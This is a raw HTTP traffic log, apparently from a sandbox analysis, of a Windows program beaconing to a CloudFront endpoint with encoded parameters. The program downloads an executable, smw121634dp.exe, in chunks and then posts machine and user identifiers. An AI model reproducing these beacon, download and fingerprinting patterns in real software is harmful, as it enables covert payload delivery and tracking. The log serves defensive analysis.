User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d1y2jryd6u59ns.cloudfront.net
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:19:56 GMT
X-Cache: Miss from cloudfront
Via: 1.1 3ccfbae98f5816b531634c1e82e45259.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 6JHsJJEIQeYo0-U4dqKv6CYhch8_WMhUszeoGYkXgpLzvmwM9QdOtA==
....
GET /p.ashx?e=b1dRW7RxYKeNWlFVunW/r8YGSI1d A8Aymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk9UB7N1/dopRLWT0ooBBF1fVw12R6ofm/Y8iQvDAJnGKH8qnmCyK7v7JBTPp2F5gxC Mhrkq09y/amn0hKiMbceR3MOwIZ76JwmTqIjEwZJX8qZPamPhh78rf8SKYsXwuBxaqSxr2X7ENAlt3MuTiXc= HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d1y2jryd6u59ns.cloudfront.net
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:19:56 GMT
X-Cache: Miss from cloudfront
Via: 1.1 3ccfbae98f5816b531634c1e82e45259.cloudfront.net (CloudFront)
X-Amz-Cf-Id: BlAOFcxwbOiXn9xTHFZ1UzETNCtZcA3a9c34Qmz6j7wUpVvdqQUGeg==
....
GET /p.ashx?e=b1dRW7RxYKeNWlFVunW/r8YGSI1d A8Aymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk9UB7N1/dopR5YFWQUANi8 KgQWEQh9QronZvqoB 8mW4yIycFcn/ g= HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d1y2jryd6u59ns.cloudfront.net
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:19:56 GMT
X-Cache: Miss from cloudfront
Via: 1.1 3ccfbae98f5816b531634c1e82e45259.cloudfront.net (CloudFront)
X-Amz-Cf-Id: HbrK3FyvFAcYm46fOi9tRs90Cqn9Eg9S-wuHmAEBaGAYkUkTGH1ZNw==
....
GET /p.ashx?e=b1dRW7RxYKeNWlFVunW/r8YGSI1d A8Aymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk9UB7N1/dopRvcTB46xWnxTTJVfgp7thqbPiCC4paVhd HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d1y2jryd6u59ns.cloudfront.net
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:19:56 GMT
X-Cache: Miss from cloudfront
Via: 1.1 3ccfbae98f5816b531634c1e82e45259.cloudfront.net (CloudFront)
X-Amz-Cf-Id: gFG1ay4GmQ0_IlYntzciED7awRAsPn-4_J9A49SOEymDwjnkPpy1oA==
....
GET /p.ashx?e=xY8ohDYpM iNWlFVunW/r0mQNIN2FjZnymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk3qnzi9PVmquIApimWCrqakE8SFHLIEPsGc6 n uqijtZ6R90h7cidQhE1rXBz99ttxfA3C6KKE5uvEmaSYLmhGU1IGevJVygthPlRO7ICGTcD5MbnMHcJ64LtTjETGDUCjBYGPK7rWfXeCi/0KZZptbQRhqH8Cssw== HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d1y2jryd6u59ns.cloudfront.net
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:19:57 GMT
X-Cache: Miss from cloudfront
Via: 1.1 3ccfbae98f5816b531634c1e82e45259.cloudfront.net (CloudFront)
X-Amz-Cf-Id: p5ELyWwKmjomEc2poXe2ugCS9kADtTjf7A5aNO6KYijkZhmOQNlnkg==
....
GET /p.ashx?e=lOCrbsNL2zWNWlFVunW/r0mQNIN2FjZnymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk3qnzi9PVmquvcTB46xWnxTle2fwOdHS0Y4G r 3F6T7bkBEy9Iv l4= HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d1y2jryd6u59ns.cloudfront.net
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:19:57 GMT
X-Cache: Miss from cloudfront
Via: 1.1 3ccfbae98f5816b531634c1e82e45259.cloudfront.net (CloudFront)
X-Amz-Cf-Id: kH9M4ekPufriambI8C0A_aLFK1VYvCRfBp-wq3vJiPyl1FtCKAtS_A==
....
GET /p.ashx?e=lOCrbsNL2zWNWlFVunW/r0mQNIN2FjZnymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk3qnzi9PVmqujsg/omkWbCTQlB3kfGAhd0M7 7p6G3XAOQeYuSCl878AKo0mRYbtZmTrdmoQBtHVvQShiKWZ9cFEj3apiqwElP87VSn8EQRfyltSMgrsTyl8aUSP2VoumlpLPC 4XcIm7cGFoGtp5ECS7IK1ett99MZ5kXJQtKy834mgW150Op0Y6r6EQu3En4ua1g4fVI4GJA9YFpnE8QO8567A9PF2tojJydmmwDtH8qBHSjX/hDYPr3Ugg3/8WtyvhlGeipNV537D3i/QmJNPHtdPmcrksKcwUL4uIo9bBcP67p/rswd0aUeoU PGdmwVVPh7TxXkBCDWG0W34WuMrG6DH6H0HA== HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d1y2jryd6u59ns.cloudfront.net
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:19:57 GMT
X-Cache: Miss from cloudfront
Via: 1.1 3ccfbae98f5816b531634c1e82e45259.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 0S8KGBuGMkqPy9cBQgxTzAdiRAmoEFbFBGUTLOwoi8dlWjrJo4koLw==
....
GET /p.ashx?e=lOCrbsNL2zWNWlFVunW/r0mQNIN2FjZnymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk3qnzi9PVmqubz0XqPn9zR0IiyFlsxNmPbPiCC4paVhdpvBRerX5l2CaTGmM9zHPWA== HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d1y2jryd6u59ns.cloudfront.net
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:19:58 GMT
X-Cache: Miss from cloudfront
Via: 1.1 3ccfbae98f5816b531634c1e82e45259.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 2YXlRet6tnFPhmM98-RqzfUyCCRYZV4i7Xhs_vNWHDiRubY12AoB8Q==
....
GET /p.ashx?e=WL9usJOVMsPlWW0ay34fCUdUxmGl9EyeYDEAjQn1Lmtt1izXJZF/6oareh65cqCLl5HByWpqmAJFOTAwlw8YF5 efKUGHk2vtZftTizYYAGj81y/KWOjZzLYAxbXqOnWZKpgXCSq4SBoojstDGwv8wEB3BDXIoENw3BCY3BRdztfQ36gIM4S0WyMJQRmsW nYPPrzpUjRdY8g5 vR6QEB/nYE3DWujWaoU2sQ4uGCDUUAvnawhe3hbDffmPgH7pM6gKn8h0qT3aBcaoZob0e9Q== HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d1y2jryd6u59ns.cloudfront.net
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:19:58 GMT
X-Cache: Miss from cloudfront
Via: 1.1 3ccfbae98f5816b531634c1e82e45259.cloudfront.net (CloudFront)
X-Amz-Cf-Id: oTTUpjh13vBM9R7uL1lLXiaPfuN6_O8D5L81ndXQn8Dj5Aee-_I0EQ==
....
GET /p.ashx?e=043Mckb8Lnhw7iCtSAyu/ QhfXa/CCW5NPZS6pZIlAEr4Spdf2ZexL9An1YluClXsGG6qLQR8LceI9VTThLJ3UlF4mqrDXF/L3OhFAPbRTejORB6u31KNxKv6VolbFNDUxX212nyBDAafyyUl C9vORgvLZHT a72UC/bfWIAgSqinVSQQ1bE6yLXK7ul6nZPXUNd68JXUDrKwD6t b1ZfKiWnlKjT8nQI8HtM9wp5Tx0cXu7AB1uimF904v4t2DIApimWCrqakt3bH6c7GAHITnquSe8GwjLnPqEPf2/rl3s8pSKbhxWudjDabjiU15bfhBVTXmVIKy2EBoQQl304tsVuXqTBm48VmE3ZuCJs4y1aJnkp ScdBb0CbA7Wqcrbq8YHwKZS4RrSPwflTyFw== HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d1y2jryd6u59ns.cloudfront.net
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:19:58 GMT
X-Cache: Miss from cloudfront
Via: 1.1 3ccfbae98f5816b531634c1e82e45259.cloudfront.net (CloudFront)
X-Amz-Cf-Id: FLVgKiMRIXIw65z1htvDBY1YfN1U0R9J56DzZNT16K0TYEc46BPLLg==
GET /smw121634dp.exe HTTP/1.1
Range: bytes=0-249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d13s98z2lzti92.cloudfront.net
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Cache-Control: private
Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT
Accept-Ranges: bytes
ETag: "44deb3125cb9d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:20:01 GMT
Content-Range: bytes 0-249999/3359008
X-Cache: Miss from cloudfront
Via: 1.1 7922e01ab53e8f36477272573223ab35.cloudfront.net (CloudFront)
X-Amz-Cf-Id: B-NB4C4upWTh9sx666RTwKjdFQiz_aRLPfClxajzrzhk1p5aClqPpg==
<<< skipped >>>
GET /smw121634dp.exe HTTP/1.1
Range: bytes=250000-499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d13s98z2lzti92.cloudfront.net
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Cache-Control: private
Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT
Accept-Ranges: bytes
ETag: "44deb3125cb9d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:20:03 GMT
Content-Range: bytes 250000-499999/3359008
X-Cache: Miss from cloudfront
Via: 1.1 7922e01ab53e8f36477272573223ab35.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 8cGGfGwRI8B_IL6HDaIf33fRLi4ZrMwjjwHxMeiWT0NKu6xAGBAn_w==
<<< skipped >>>
GET /smw121634dp.exe HTTP/1.1
Range: bytes=750000-999999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d13s98z2lzti92.cloudfront.net
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Cache-Control: private
Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT
Accept-Ranges: bytes
ETag: "44deb3125cb9d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:20:06 GMT
Content-Range: bytes 750000-999999/3359008
X-Cache: Miss from cloudfront
Via: 1.1 7922e01ab53e8f36477272573223ab35.cloudfront.net (CloudFront)
X-Amz-Cf-Id: xv60FsoCinZiXNy8Zd2f8DEi2-0SNRbuelKIwqOuswlbv7_QTYlp2w==
<<< skipped >>>
GET /smw121634dp.exe HTTP/1.1
Range: bytes=1250000-1499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d13s98z2lzti92.cloudfront.net
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Cache-Control: private
Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT
Accept-Ranges: bytes
ETag: "44deb3125cb9d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:20:06 GMT
Content-Range: bytes 1250000-1499999/3359008
X-Cache: Miss from cloudfront
Via: 1.1 7922e01ab53e8f36477272573223ab35.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 5qszbFpfEM6_n_SHqnSua2dClwcYhoalNqftFuUXQXLNifKQ_LQnmQ==
<<< skipped >>>
GET /smw121634dp.exe HTTP/1.1
Range: bytes=1500000-1749999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d13s98z2lzti92.cloudfront.net
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Cache-Control: private
Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT
Accept-Ranges: bytes
ETag: "44deb3125cb9d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:20:06 GMT
Content-Range: bytes 1500000-1749999/3359008
X-Cache: Miss from cloudfront
Via: 1.1 7922e01ab53e8f36477272573223ab35.cloudfront.net (CloudFront)
X-Amz-Cf-Id: A1qcf8jMm6EfdnLBl4pfkuyLfq9M7Uqf5dGsKlmAbbga_l7uEdSQdw==
<<< skipped >>>
GET /smw121634dp.exe HTTP/1.1
Range: bytes=1750000-1999999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d13s98z2lzti92.cloudfront.net
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Cache-Control: private
Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT
Accept-Ranges: bytes
ETag: "44deb3125cb9d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:20:07 GMT
Content-Range: bytes 1750000-1999999/3359008
X-Cache: Miss from cloudfront
Via: 1.1 7922e01ab53e8f36477272573223ab35.cloudfront.net (CloudFront)
X-Amz-Cf-Id: O60HVq8xryQtoELtUxkF8_4apIxdbPGzEchY3NXfaSwuRUB2_efYeQ==
<<< skipped >>>
GET /smw121634dp.exe HTTP/1.1
Range: bytes=2250000-2499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d13s98z2lzti92.cloudfront.net
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Cache-Control: private
Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT
Accept-Ranges: bytes
ETag: "44deb3125cb9d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:20:07 GMT
Content-Range: bytes 2250000-2499999/3359008
X-Cache: Miss from cloudfront
Via: 1.1 7922e01ab53e8f36477272573223ab35.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 61z2GHNcv2SJ3EZCGA9l_0zla_R829QyYR1XaPZy4XAvFw6c-lfzJA==
<<< skipped >>>
GET /smw121634dp.exe HTTP/1.1
Range: bytes=2750000-2999999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d13s98z2lzti92.cloudfront.net
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Cache-Control: private
Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT
Accept-Ranges: bytes
ETag: "44deb3125cb9d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:20:08 GMT
Content-Range: bytes 2750000-2999999/3359008
X-Cache: Miss from cloudfront
Via: 1.1 7922e01ab53e8f36477272573223ab35.cloudfront.net (CloudFront)
X-Amz-Cf-Id: PbnrUwqUApr6PQSXhWpG9mCaD8OZ9r3J7nW8I5ZDgeRhArGZtOc_dQ==
<<< skipped >>>
GET /smw121634dp.exe HTTP/1.1
Range: bytes=3250000-3359007
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d13s98z2lzti92.cloudfront.net
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 109008
Connection: keep-alive
Cache-Control: private
Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT
Accept-Ranges: bytes
ETag: "44deb3125cb9d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:20:09 GMT
Content-Range: bytes 3250000-3359007/3359008
X-Cache: Miss from cloudfront
Via: 1.1 7922e01ab53e8f36477272573223ab35.cloudfront.net (CloudFront)
X-Amz-Cf-Id: I31ccdgXE3qawaG5WkECGySddehcAOPF3r7sbp2_0ec9HAyJnKf0nA==
<<< skipped >>>
GET /smw121634dp.exe HTTP/1.1
Range: bytes=500000-749999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d13s98z2lzti92.cloudfront.net
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Cache-Control: private
Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT
Accept-Ranges: bytes
ETag: "44deb3125cb9d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:20:03 GMT
Content-Range: bytes 500000-749999/3359008
X-Cache: Miss from cloudfront
Via: 1.1 1f8a17c41295fac39556a328869a62bd.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 73bYzrGAQNmnG1baOMtjc5-dfLee3rDLMHTGLcQTJSulzOA0hZRqNA==
<<< skipped >>>
GET /smw121634dp.exe HTTP/1.1
Range: bytes=1000000-1249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d13s98z2lzti92.cloudfront.net
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Cache-Control: private
Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT
Accept-Ranges: bytes
ETag: "44deb3125cb9d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:20:06 GMT
Content-Range: bytes 1000000-1249999/3359008
X-Cache: Miss from cloudfront
Via: 1.1 1f8a17c41295fac39556a328869a62bd.cloudfront.net (CloudFront)
X-Amz-Cf-Id: GOtOcUaeRubNkdJJcxbDp34Q7UvWRt24FjfdWQixZSboFzckdf8XyA==
GET /smw121634dp.exe HTTP/1.1
Range: bytes=2000000-2249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d13s98z2lzti92.cloudfront.net
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Cache-Control: private
Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT
Accept-Ranges: bytes
ETag: "44deb3125cb9d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:20:07 GMT
Content-Range: bytes 2000000-2249999/3359008
X-Cache: Miss from cloudfront
Via: 1.1 1f8a17c41295fac39556a328869a62bd.cloudfront.net (CloudFront)
X-Amz-Cf-Id: In5ZPfnrz4RStEHUJKJFc_bd7MY7cv54AbD8JuHhDS8qw4BcFn41mQ==
GET /smw121634dp.exe HTTP/1.1
Range: bytes=2500000-2749999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d13s98z2lzti92.cloudfront.net
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Cache-Control: private
Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT
Accept-Ranges: bytes
ETag: "44deb3125cb9d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:20:07 GMT
Content-Range: bytes 2500000-2749999/3359008
X-Cache: Miss from cloudfront
Via: 1.1 1f8a17c41295fac39556a328869a62bd.cloudfront.net (CloudFront)
X-Amz-Cf-Id: UJBgyu-grWH9iJrDK9N1Fi5GMnW6lToTKqBVlqBOJkPDl2iaqxci9g==
GET /smw121634dp.exe HTTP/1.1
Range: bytes=3000000-3249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d13s98z2lzti92.cloudfront.net
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Cache-Control: private
Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT
Accept-Ranges: bytes
ETag: "44deb3125cb9d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:20:08 GMT
Content-Range: bytes 3000000-3249999/3359008
X-Cache: Miss from cloudfront
Via: 1.1 1f8a17c41295fac39556a328869a62bd.cloudfront.net (CloudFront)
X-Amz-Cf-Id: HYkReG18M0uc9GlZ8mnOOUb0KoWlETc6mEBYP88wmo9j6kPC8AKe5Q==
GET /p.ashx?e=lOCrbsNL2zXY n Drgf83Ceu24nwBOho9kJpoiaoxYR6njPZcIS19LQZ0RbIZgn/G04r2GZQbxA4k4Gm5vvSsnGAt48jCvkuTKeC3EisBSuPQCW3Xc52o2/NJcbq0HoEgctTzNTrZipoENv9hv yb1U5UwOzfEgnfa6VRey9pub6LKPMT5YRxqPDlT6qw/1mxko6F4tH/rEF31vgH 2Mri4btG OZIk/aFQl5nsf8/DcvKSgaF6RF7PiCC4paVhdYzx82mF 8 w= HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d1y2jryd6u59ns.cloudfront.net
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:20:14 GMT
X-Cache: Miss from cloudfront
Via: 1.1 27b3a801292660302bc6c8d6a96c71ce.cloudfront.net (CloudFront)
X-Amz-Cf-Id: IqKgcCHBKYBnbQOW_sqLgoSHwKTPgWNQH-dElrevhRthrbjMuiZTUQ==
GET /p.ashx?e=lOCrbsNL2zXY n Drgf83Ceu24nwBOho9kJpoiaoxYTLUfe2AWI4iW/NJcbq0HoEgctTzNTrZipoENv9hv yb1U5UwOzfEgnfa6VRey9pub6LKPMT5YRxqPDlT6qw/1mxko6F4tH/rEF31vgH 2Mri4btG OZIk/aFQl5nsf8/DcvKSgaF6RF7PiCC4paVhdKPgmwjXNu7I= HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d1y2jryd6u59ns.cloudfront.net
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:20:14 GMT
X-Cache: Miss from cloudfront
Via: 1.1 d6fa2e1de8f392301c10fd5bb7b263c3.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 5dGyfRyvNsaT36GyavkHw40BfuerDGzXL3efhPpd2OpD9RNXP77kuQ==
GET /p.ashx?e=bdqY0vC4PYtCQdt9doPgoA0rZFNspeHnFDDfVv/vH29/uaLevhL3VpGCCoDalgcEvSm4upuKAkb3HPmTAFrGinfglf7YsJYJYvL zeepkoH7lS9xrvVML BEf8zqYXvVBuc4HO5RaucB0eAPmqRh7cqZ27dtquSa6Yc5lgnLWj9NhpNg/N/OrsNgV0KIQ93 dulfay3 QHl32cx0G27ZSGAqR2XPWVGh9o0hxHg3iWEUAvnawhe3hRc0NdkJ4D18DFbcjOkM5Uo QFr7zZfYbQ== HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d1y2jryd6u59ns.cloudfront.net
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:20:14 GMT
X-Cache: Miss from cloudfront
Via: 1.1 d6fa2e1de8f392301c10fd5bb7b263c3.cloudfront.net (CloudFront)
X-Amz-Cf-Id: WIaVVq4FaajpOxw7kcMX8NRAQnzthqVVm6lg-bt7YByOUnE5sU4r-A==
POST /br.ashx?pid={PID}&aid={AID}&ss=0&s=FAAzamodk0,99999999-9999-4180-88c6-7a076893e507,&v=2.3.12.1634&md5=8fabe64f8ec5d8b0b835e8a83f29082c&mid=AiAAAiAAA3A9AAA7A3AJieA1A91J7L773DiLAiiAA13D1J&uid=6F75218C-FEA5-4C12-BC59-BB31CD1E1E1A HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.0)
Host: d23ocewf5ttxmu.cloudfront.net
Content-Length: 2086
Connection: Keep-Alive
Cache-Control: no-cache
